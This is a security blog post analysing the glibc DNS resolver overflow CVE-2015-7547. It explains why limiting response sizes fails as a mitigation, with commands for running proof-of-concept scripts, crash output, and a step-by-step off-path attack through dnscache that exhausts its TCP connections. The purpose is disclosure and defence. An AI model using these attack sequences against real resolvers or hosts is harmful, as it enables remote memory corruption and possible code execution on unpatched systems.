This post was written by Marek Vavruša and Jaime Cochran, who found out they were both independently working on the same glibc vulnerability attack vectors at 3am last Tuesday.
A buffer overflow error in GNU libc DNS stub resolver code was announced last week as CVE-2015-7547. While it doesn't have any nickname yet (last year's Ghost was more catchy), it is potentially disastrous as it affects any platform with recent GNU libc—CPEs, load balancers, servers and personal computers alike. The big question is: how exploitable is it in the real world?
It turns out that the only mitigation that works is patching. Please patch your systems now, then come back and read this blog post to understand why attempting to mitigate this attack by limiting DNS response sizes does not work.
But first, patch!
Let's start with the PoC from Google, it uses the first attack vector described in the vulnerability announcement. First, a 2048-byte UDP response forces buffer allocation, then a failure response forces a retry, and finally the last two answers smash the stack.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf $ sudo python poc.py & $ valgrind curl http://foo.bar.google.com ==17897== Invalid read of size 1 ==17897== at 0x59F9C55: __libc_res_nquery (res_query.c:264) ==17897== by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591) ==17897== by 0x59FA7A8: __libc_res_nsearch (res_query.c:381) ==17897== by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315) ==17897== by 0x4242424242424241: ??? ==17897== Address 0x4242424242424245 is not stack'd, malloc'd or (recently) free'd Segmentation fault
This proof of concept requires attacker talking with glibc stub resolver code either directly or through a simple forwarder. This situation happens when your DNS traffic is intercepted or when you’re using an untrusted network.
One of the suggested mitigations in the announcement was to limit UDP response size to 2048 bytes, 1024 in case of TCP. Limiting UDP is, with all due respect, completely ineffective and only forces legitimate queries to retry over TCP. Limiting TCP answers is a plain protocol violation that cripples legitimate answers:
$ dig @b.gtld-servers.net +tcp +dnssec NS root-servers.net | grep "MSG SIZE" ;; MSG SIZE rcvd: 1254
Regardless, let's see if response size clipping is effective at all. When calculating size limits, we have to take IP4 headers into account (20 octets), and also the UDP header overhead (8 octets), leading to a maximum allowed datagram size of 2076 octets. DNS/TCP may arrive fragmented—for the sake of argument, let's drop DNS/TCP altogether.
$ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP $ sudo iptables -I INPUT -p tcp --sport 53 -j DROP $ valgrind curl http://foo.bar.google.com curl: (6) Could not resolve host: foo.bar.google.com
Looks like we've mitigated the first attack method, albeit with collateral damage. But what about the UDP-only proof of concept?
$ echo "nameserver 127.0.0.10" | sudo tee /etc/resolv.conf $ sudo python poc-udponly.py & $ valgrind curl http://foo.bar.google.com ==18293== Syscall param socketcall.recvfrom(buf) points to unaddressable byte(s) ==18293== at 0x4F1E8C3: __recvfrom_nocancel (syscall-template.S:81) ==18293== by 0x59FBFD0: send_dg (res_send.c:1259) ==18293== by 0x59FBFD0: __libc_res_nsend (res_send.c:557) ==18293== by 0x59F9C0B: __libc_res_nquery (res_query.c:227) ==18293== by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591) ==18293== by 0x59FA7A8: __libc_res_nsearch (res_query.c:381) ==18293== by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315) ==18293== by 0x4F08AA0: gaih_inet (getaddrinfo.c:862) ==18293== by 0x4F0AC4C: getaddrinfo (getaddrinfo.c:2418) ==18293== Address 0xfff001000 is not stack'd, malloc'd or (recently) free'd *** Error in `curl': double free or corruption (out): 0x00007fe7331b2e00 *** Aborted
While it's not possible to ship a whole attack payload in 2048 UDP response size, it still leads to memory corruption. When the announcement suggested blocking DNS UDP responses larger than 2048 bytes as a viable mitigation, it confused a lot of people, including other DNS vendors and ourselves. This, and the following proof of concept show that it's not only futile, but harmful in long term if these rules are left enabled.
So far, the presented attacks required a MitM scenario, where the attacker talks to a glibc resolver directly. A "good enough" mitigation is to run a local caching resolver, to isolate glibc code from the attacker. In fact, doing so not only improves the Internet performance with a local cache, but also prevents past and possibly future security vulnerabilities.
Is a caching stub resolver really good enough?
Unfortunately, no. A local stub resolver such as dnsmasq alone is not sufficient to defuse this attack. It's easy to traverse, as it doesn't scrub upstream answers—let's see if the attack goes through with a modified proof of concept that uses only well-formed answers and zero time-to-live (TTL) for cache traversal.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf $ sudo dnsmasq -d -a 127.0.0.1 -R -S 127.0.0.10 -z & $ sudo python poc-dnsmasq.py & $ valgrind curl http://foo.bar.google.com ==20866== Invalid read of size 1 ==20866== at 0x8617C55: __libc_res_nquery (res_query.c:264) ==20866== by 0x861820F: __libc_res_nquerydomain (res_query.c:591) ==20866== by 0x86187A8: __libc_res_nsearch (res_query.c:381) ==20866== by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315) ==20866== by 0x1C000CC04D4D4D4C: ??? Killed
The big question is—now that we've seen that the mitigation strategies for MitM attacks are provably ineffective, can we exploit the flaw off-path through a caching DNS resolver?
An off-path attack scenario
Let's start with the first phase of the attack—a compliant resolver is never going to give out a response larger than 512 bytes over UDP to a client that doesn't support EDNS0. Since the glibc resolver doesn't do that by default, we have to escalate to TCP and perform the whole attack there. Also, the client should have at least two nameservers, otherwise it complicates a successful attack.
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf $ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf $ sudo iptables -F INPUT $ sudo iptables -I INPUT -p udp --sport 53 -m length --length 2077:65535 -j DROP
Let's try it with a proof of concept that merges both the DNS proxy and the attacker.
The DNS proxy on localhost is going to ask the attacker both queries over UDP, and the attacker responds with a TC flag to force client to retry over TCP.
The attacker responds once with a TCP response of 2049 bytes or longer, then forces the proxy to close the TCP connection to glibc resolver code. This is a critical step with no reliable way to achieve that.
The attacker sends back a full attack payload, which the proxy happily forwards to the glibc resolver client.
$ sudo python poc-tcponly.py & $ valgrind curl http://foo.bar.google.com ==18497== Invalid read of size 1 ==18497== at 0x59F9C55: __libc_res_nquery (res_query.c:264) ==18497== by 0x59FA20F: __libc_res_nquerydomain (res_query.c:591) ==18497== by 0x59FA7A8: __libc_res_nsearch (res_query.c:381) ==18497== by 0x57EEAAA: _nss_dns_gethostbyname4_r (dns-host.c:315) ==18497== by 0x1C000CC04D4D4D4C: ??? ==18497== Address 0x1000000000000103 is not stack'd, malloc'd or (recently) free'd Killed
Performing the attack over a real resolver
The key factor to a real world non-MitM cache resolver attack is to control the messages between the resolver and the client indirectly. We came to the conclusion that djbdns’ dnscache was the best target for attempting to illustrate an actual cache traversal.
In order to fend off DoS attack vectors like slowloris, which makes numerous simultaneous TCP connections and holds them open to clog up a service, DNS resolvers have a finite pool of parallel TCP connections. This is usually achieved by limiting these parallel TCP connections and closing the oldest or least-recently active one. For example—djbdns (dnscache) holds up to 20 parallel TCP connections, then starts dropping them, starting from the oldest one. Knowing this, we realised that we were able to terminate TCP connections with ease. Thus, one security fix becomes another bug’s treasure.
In order to exploit this, the attacker can send a truncated UDP A+AAAA query, which triggers the necessary retry over TCP. The attacker responds with a valid answer with a TTL of 0 and dnscache sends the glibc client a truncated UDP response. At this point, the glibc function
send_vc() retries with dnscache over TCP and since the previous answer's TTL was 0, dnscache asks the attacker’s server for the A+AAAA query again. The attacker responds to the A query with an answer larger than 2000 to induce glibc's buffer mismanagement, and dnscache then forwards it to the client. Now the attacker can either wait out the AAAA query while other clients are making perfectly legitimate requests or instead make 20 TCP connections back to dnscache, until dnscache terminates the attacker's connection.
Now that we’ve met all the conditions to trigger another retry, the attacker sends back any valid A response and a valid, oversized AAAA that carries the payload (either in CNAME or AAAA RDATA), dnscache tosses this back to the client, triggering the overflow.
It seems like a complicated process, but it really is not. Let’s have a look at our proof-of-concept:
$ echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf $ echo "nameserver 127.0.0.1" | sudo tee -a /etc/resolv.conf $ sudo python poc-dnscache.py [TCP] Sending back first big answer with TTL=0 [TCP] Sending back second big answer with TTL=0 [TCP] Preparing the attack with an answer >2k [TCP] Connecting back to caller to force it close original connection('127.0.0.1', 53) [TCP] Original connection was terminated, expecting to see requery... [TCP] Sending back a valid answer in A [TCP] Sending back attack payload in AAAA
$ valgrind curl https://www.cloudflare.com/ ==6025== Process terminating with default action of signal 11 (SIGSEGV) ==6025== General Protection Fault ==6025== at 0x8617C55: __libc_res_nquery (res_query.c:264) ==6025== by 0x861820F: __libc_res_nquerydomain (res_query.c:591) ==6025== by 0x86187A8: __libc_res_nsearch (res_query.c:381) ==6025== by 0xA0C6AAA: _nss_dns_gethostbyname4_r (dns-host.c:315) ==6025== by 0x1C000CC04D4D4D4C: ??? Killed
This PoC was made to simply illustrate that it’s not only probable, but possible that a remote code execution via DNS resolver cache traversal can and may be happening. So, patch. Now.
We reached out to OpenDNS, knowing they had used djbdns as part of their codebase. They investigated and verified this particular attack does not affect their resolvers.
How accidental defenses saved the day
Dan Kaminsky wrote a thoughtful blog post about scoping this issue. He argues:
I’m just going to state outright: Nobody has gotten this glibc flaw to work
through caches yet. So we just don’t know if that’s possible. Actual
exploit chains are subject to what I call the MacGyver effect.
Current resolvers scrub and sanitize final answers, so the attack payload must be encoded in a well-formed DNS answer to survive a pass through the resolver. In addition, only some record types are safely left intact—as the attack payload is carried in AAAA query, only AAAA records in the answer section are safe from being scrubbed, thus forcing the attacker to encode the payload in these. One way to circumvent this limitation is to use a CNAME record, where the attack payload may be encoded in a CNAME target (maximum of 255 octets).
The only good mitigation is to run a DNS resolver on localhost where the attacker can't introduce resource exhaustion, or at least enforce minimum cache TTL to defuse the waiting game attack.
You might think it's unlikely that you could become a MitM target, but the fact is that you already are. If you ever used a public Wi-Fi in an airport, hotel or maybe in a café, you may have noticed being redirected to a captcha portal for authentication purposes. This is a temporary DNS hijacking redirecting you to an internal portal until you agree with the terms and conditions. What's even worse is a permanent DNS interception that you don't notice until you look at the actual answers. This happens on a daily basis and takes only a single name lookup to trigger the flaw.
Neither DNSSEC nor independent public resolvers prevent it, as the attack happens between stub and the recursor on the last mile. The recent flaws highlight the fragility of not only legacy glibc code, but also stubs in general. DNS is deceptively complicated protocol and should be treated carefully. A generally good mitigation is to shield yourself with a local caching DNS resolver1, or at least a DNSCrypt tunnel. Arguably, there might be a vulnerability in the resolver as well, but it is contained to the daemon itself—not to everything using the C library (e.g., sudo).
Are you affected?
If you're running GNU libc between 2.9 and 2.22 then yes. Below is an informative list of several major platforms affected.
|Debian||CVE-2015-7547||Patched packages available (squeeze and newer)|
|Ubuntu||USN-2900-1||Patched packages available (14.04 and newer)|
|RHEL||KB2161461||Patched packages available (RHEL 6-7)|
|SUSE||SUSE-SU-2016:0472-1||Patched packages available (latest)|
|Network devices & CPEs||Updated list of affected platforms|
The toughest problem with this issue is the long tail of custom CPEs and IoT devices, which can't be really enumerated. Consult the manufacturer's website for vulnerability disclosure. Keep in mind that if your CPE is affected by remote code execution, its network cannot be treated as safe anymore.
If you're running OS X, iOS, Android or any BSD flavour2, you're not affected.